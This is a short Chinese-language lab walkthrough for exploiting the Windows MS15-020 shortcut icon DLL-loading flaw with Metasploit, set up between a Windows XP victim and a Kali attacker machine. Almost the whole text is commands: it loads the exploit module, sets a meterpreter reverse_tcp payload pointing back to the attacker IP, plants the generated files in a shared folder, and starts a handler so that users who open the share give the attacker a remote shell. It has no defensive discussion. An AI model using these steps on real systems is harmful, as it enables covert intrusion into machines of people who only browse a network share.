环境: 共享机/受害者:windows xp IP:192.168.222.1 攻击机:kali linux IP:192.168.10.1
msfconsole //在kali终端输入msfconsole进入控制台
search ms15-020 //搜索ms15-020漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //使用该模块
show options //显示所有参数
set payload windows/meterpreter/reverse_tcp //设置payload
设置参数:
set unchost 192.168.222.1 //共享的主机地址
set uncshare //共享的文件夹名
set lhost 192.168.10.1 //攻击机IP地址
exploit
运行后会生成三个文件,将三个文件放到共享机的share目录下。
继续在msf中使用handler进行监听:
use exploit/multi/handler
set payload windows/meterpreter/reverser_tcp
set lhost 192.168.10.1
exploit
以上设置完成之后在当别的用户再访问这个共享文件夹时就可以直接获得meterpreter